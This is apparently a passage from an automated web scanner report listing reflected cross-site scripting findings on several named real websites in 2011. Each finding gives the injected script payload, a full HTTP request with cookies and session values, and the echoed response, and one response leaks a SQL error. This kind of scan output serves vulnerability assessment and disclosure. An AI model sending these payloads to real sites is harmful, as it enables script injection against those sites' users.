Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:06 GMT
Expires: Mon, 14 Feb 2011 01:41:06 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSBCCTBC=JNHLGMJDDEIFFMLKCFPLFICO; path=/
X-Powered-By: ASP.NET
Content-Length: 1440
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'e'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55e110e<script>alert(1)</script>58ad681b7d5, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 49160, @adrotationId = 13047, @ipAddress = '173.193.214.243', @sessionId = '969372960', @pixel = '0', @ipNumber = '291516
...[SNIP]...

1.270. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://trk.vindicosuite.com
Path:	/Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the syndicationOutletId request parameter is copied into the HTML document as plain text between tags. The payload 86b3e<script>alert(1)</script>9aa31f72b87 was submitted in the syndicationOutletId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=4916086b3e<script>alert(1)</script>9aa31f72b87&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:18 GMT
Expires: Mon, 14 Feb 2011 01:41:19 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSACDSAD=BLAKANJDADMMFKBPOLFENHHI; path=/
X-Powered-By: ASP.NET
Content-Length: 1442
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'b3e'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 4916086b3e<script>alert(1)</script>9aa31f72b87, @adrotationId = 13047, @ipAddress = '173.193.214.243', @sessionId = '970022704', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_Ba
...[SNIP]...

1.271. http://uk.reuters.com/assets/commentsChild [articleId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://uk.reuters.com
Path:	/assets/commentsChild

Issue detail

The value of the articleId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fac44"><script>alert(1)</script>b818c7a361b was submitted in the articleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?articleId=UKTRE71C1YB20110213fac44"><script>alert(1)</script>b818c7a361b&headline=%27%27The+King%27s+Speech%27%27+royal+winner+at+BAFTA+awards&channel=lifestyleMolt&edition=UK&view=base HTTP/1.1
Host: uk.reuters.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie; adDisplayManager=freqCap_fixedpanel=1297647341048~1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 4288



<!--[if !IE]> token: a03a4b1f-8f2f-4acd-99d4-9495c4db1628 <![
...[SNIP]...
<input type="hidden" name="article_id" value="UKTRE71C1YB20110213fac44"><script>alert(1)</script>b818c7a361b" />
...[SNIP]...

1.272. http://uk.reuters.com/assets/commentsChild [channel parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://uk.reuters.com
Path:	/assets/commentsChild

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 281d2"><script>alert(1)</script>31d7addbad8 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?articleId=UKTRE71C1YB20110213&headline=%27%27The+King%27s+Speech%27%27+royal+winner+at+BAFTA+awards&channel=lifestyleMolt281d2"><script>alert(1)</script>31d7addbad8&edition=UK&view=base HTTP/1.1
Host: uk.reuters.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie; adDisplayManager=freqCap_fixedpanel=1297647341048~1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 4611



<!--[if !IE]> token: 713cd201-ddcb-44ba-94cd-1013a824fea5 <![
...[SNIP]...
<input type="hidden" name="channel" value="lifestyleMolt281d2"><script>alert(1)</script>31d7addbad8" />
...[SNIP]...

1.273. http://uk.reuters.com/assets/sharedModuleJS [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://uk.reuters.com
Path:	/assets/sharedModuleJS

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4ee36<script>alert(1)</script>25f5b98f8d4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/sharedModuleJS?view=RSM-UK-NavFlyoutContent1&globalJSVariable=&callback=Reuters.nav.callback14ee36<script>alert(1)</script>25f5b98f8d4&sp= HTTP/1.1
Host: uk.reuters.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:44 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Mon, 14 Feb 2011 01:27:35 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 12326




Reuters.nav.callback14ee36<script>alert(1)</script>25f5b98f8d4('<div class="section">
...[SNIP]...

1.274. http://uk.reuters.com/assets/sharedModuleJS [sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://uk.reuters.com
Path:	/assets/sharedModuleJS

Issue detail

The value of the sp request parameter is copied into an HTML comment. The payload 112a5--><script>alert(1)</script>3821ad28cd4 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/sharedModuleJS?view=RSM-UK-NavFlyoutContent1&globalJSVariable=&callback=Reuters.nav.callback1&sp=112a5--><script>alert(1)</script>3821ad28cd4 HTTP/1.1
Host: uk.reuters.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:46 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Mon, 14 Feb 2011 01:27:35 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 15063



<script>alert(1)</script>3821ad28cd4/business/summits">
...[SNIP]...

1.275. http://uk.reuters.com/assets/sharedModuleJS [sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://uk.reuters.com
Path:	/assets/sharedModuleJS

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5722"><script>alert(1)</script>7a186b758c3 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/sharedModuleJS?view=RSM-UK-NavFlyoutContent1&globalJSVariable=&callback=Reuters.nav.callback1&sp=f5722"><script>alert(1)</script>7a186b758c3 HTTP/1.1
Host: uk.reuters.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:44 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Mon, 14 Feb 2011 01:27:35 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 15000



<!--[if !IE]> token: 32575fb7-ba79-4402-8b83-78ce948e5702 <![
...[SNIP]...
<a href="f5722"><script>alert(1)</script>7a186b758c3/business">
...[SNIP]...

1.276. http://uk.reuters.com/tracker/guid [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://uk.reuters.com
Path:	/tracker/guid

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 71566%3balert(1)//4e176012b68 was submitted in the cb parameter. This input was echoed as 71566;alert(1)//4e176012b68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tracker/guid?cb=doTrack783971566%3balert(1)//4e176012b68 HTTP/1.1
Host: uk.reuters.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie; adDisplayManager=freqCap_fixedpanel=1297647341048~1; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297668987403:ss=1297668987403; __utmz=28259640.1297647396.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=28259640.2003575633.1297647396.1297647396.1297647396.1; __utmc=28259640; __utmb=28259640.1.10.1297647396; rsi_segs=D08734_70009|D08734_70011|D08734_70049|D08734_70057|D08734_70075|D08734_70086|D08734_70093|D08734_70509|D08734_71432

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:39:19 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: text/javascript
Connection: close
Content-Length: 150

typeof doTrack783971566;alert(1)//4e176012b68==='function'&&doTrack783971566;alert(1)//4e176012b68({"userID":"cb1e43fa-a25f-4a75-8476-7ef823b513a4"});

1.277. http://web.adblade.com/imps.php [description_color parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://web.adblade.com
Path:	/imps.php

Issue detail

The value of the description_color request parameter is copied into an HTML comment. The payload c7eec--><script>alert(1)</script>9b898ec0147 was submitted in the description_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3452&ad_width=876&ad_height=200&img_pad=2&title_font=1&title_color=0066cc&description_font=1&description_color=000000c7eec--><script>alert(1)</script>9b898ec0147&id=111&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-806598134-1296072892362; __tuid=3911816417148998155; __esgs=G6LakLyNC66xftdQujJgAKhNo%2BVdJNvT4b1UxBBAJu4%3D; __sgs=zBgkd9JWM%2F7wEn91CzQUOJmrNvQIA6tPw07aWYGFqD8%3D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1297646101.66437087108; expires=Tue, 15-Feb-2011 01:15:01 GMT; path=/
Content-type: text/html
Date: Mon, 14 Feb 2011 01:15:01 GMT
Server: lighttpd/1.4.21
Content-Length: 15623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
font-family:Arial,Helvetica,sans-serif; }
.adDescription1_111, .adDescription1_111:link, .adDescription1_111:visited, .adDescription1_111:hover {
color:#000000c7eec--><script>alert(1)</script>9b898ec0147; font-family:Arial,Helvetica,sans-serif; }
.adImage1_111 {
padding-left:2px; }
-->
...[SNIP]...

1.278. http://web.adblade.com/imps.php [img_pad parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://web.adblade.com
Path:	/imps.php

Issue detail

The value of the img_pad request parameter is copied into an HTML comment. The payload 64375--><script>alert(1)</script>cad48fafda7 was submitted in the img_pad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3452&ad_width=876&ad_height=200&img_pad=264375--><script>alert(1)</script>cad48fafda7&title_font=1&title_color=0066cc&description_font=1&description_color=000000&id=111&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-806598134-1296072892362; __tuid=3911816417148998155; __esgs=G6LakLyNC66xftdQujJgAKhNo%2BVdJNvT4b1UxBBAJu4%3D; __sgs=zBgkd9JWM%2F7wEn91CzQUOJmrNvQIA6tPw07aWYGFqD8%3D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1297646085.89059849331; expires=Tue, 15-Feb-2011 01:14:45 GMT; path=/
Content-type: text/html
Date: Mon, 14 Feb 2011 01:14:45 GMT
Server: lighttpd/1.4.18
Content-Length: 15350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
n1_111:visited, .adDescription1_111:hover {
color:#000000; font-family:Arial,Helvetica,sans-serif; }
.adImage1_111 {
padding-left:264375--><script>alert(1)</script>cad48fafda7px; }
-->
...[SNIP]...

1.279. http://web.adblade.com/imps.php [title_color parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://web.adblade.com
Path:	/imps.php

Issue detail

The value of the title_color request parameter is copied into an HTML comment. The payload f56a6--><script>alert(1)</script>45d104bf298 was submitted in the title_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imps.php?app=3452&ad_width=876&ad_height=200&img_pad=2&title_font=1&title_color=0066ccf56a6--><script>alert(1)</script>45d104bf298&description_font=1&description_color=000000&id=111&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-806598134-1296072892362; __tuid=3911816417148998155; __esgs=G6LakLyNC66xftdQujJgAKhNo%2BVdJNvT4b1UxBBAJu4%3D; __sgs=zBgkd9JWM%2F7wEn91CzQUOJmrNvQIA6tPw07aWYGFqD8%3D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1297646093.797656521573; expires=Tue, 15-Feb-2011 01:14:53 GMT; path=/
Content-type: text/html
Date: Mon, 14 Feb 2011 01:14:53 GMT
Server: lighttpd/1.4.18
Content-Length: 15511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
nk, .adTitle1_111:visited, .adTitle1_111:hover,
.adLearnMoreLink1_111, .adLearnMoreLink1_111:link, .adLearnMoreLink1_111:visited, .adLearnMoreLink1_111:hover {
color:#0066ccf56a6--><script>alert(1)</script>45d104bf298; font-family:Arial,Helvetica,sans-serif; }
.adDescription1_111, .adDescription1_111:link, .adDescription1_111:visited, .adDescription1_111:hover {

...[SNIP]...

1.280. http://widgets.digg.com/buttons/count [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.digg.com
Path:	/buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 27af1<script>alert(1)</script>8513e393b5a was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=http%3A//www.cbsnews.com/8301-503544_162-20031629-503544.html27af1<script>alert(1)</script>8513e393b5a HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 14 Feb 2011 01:35:11 GMT
Via: NS-CACHE: 100
Etag: "f8541588bddf3eb1bbf54cd9fc665855a3fa6f8e"
Content-Length: 144
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Mon, 14 Feb 2011 01:45:10 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://www.cbsnews.com/8301-503544_162-20031629-503544.html27af1<script>alert(1)</script>8513e393b5a", "diggs": 0});

1.281. http://www.dianomioffers.co.uk/smartads.epl [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dianomioffers.co.uk
Path:	/smartads.epl

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 198f9"><script>alert(1)</script>ddb3314bdd4 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartads.epl?id=752198f9"><script>alert(1)</script>ddb3314bdd4 HTTP/1.1
Host: www.dianomioffers.co.uk
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:57 GMT
Server: Apache
Cache-Control: no-cache,no-store,private
Pragma: no-cache
Expires: now
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<
...[SNIP]...
le.&smartreferer=http%3A%2F%2Fuk%2Ereuters%2Ecom%2Farticle%2F2011%2F02%2F13%2Fus%2Dbafta%2DidUKTRE71C1YB20110213&partner=1&ad=176&savid=478&top_pid=1791&tag=smartad&said=752198f9"><script>alert(1)</script>ddb3314bdd4&adv=&psa=" >
...[SNIP]...

1.282. http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx [photo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.legacy.com
Path:	/legacies/2011/obituary-photo-gallery.aspx

Issue detail

The value of the photo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e96f0"style%3d"x%3aexpression(alert(1))"520eb12a7af was submitted in the photo parameter. This input was echoed as e96f0"style="x:expression(alert(1))"520eb12a7af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /legacies/2011/obituary-photo-gallery.aspx?photo=betty-garrette96f0"style%3d"x%3aexpression(alert(1))"520eb12a7af&pid=148615818 HTTP/1.1
Host: www.legacy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur; ASP.NET_SessionId=eevpvg2f4ay2ys55kygehvjk; __qca=P0-2042163798-1297527399993;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:21:47 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Betty Garret
...[SNIP]...
<link rel="canonical" href="http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx?photo=betty-garrette96f0"style="x:expression(alert(1))"520eb12a7af&pid=148615818"/>
...[SNIP]...

1.283. http://www.nola.com/cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata [EXP parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nola.com
Path:	/cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata

Issue detail

The value of the EXP request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 65478%3balert(1)//a1064b052ee was submitted in the EXP parameter. This input was echoed as 65478;alert(1)//a1064b052ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata?NAME=POPUNDER&EXP=165478%3balert(1)//a1064b052ee HTTP/1.1
Host: www.nola.com
Proxy-Connection: keep-alive
Referer: http://www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
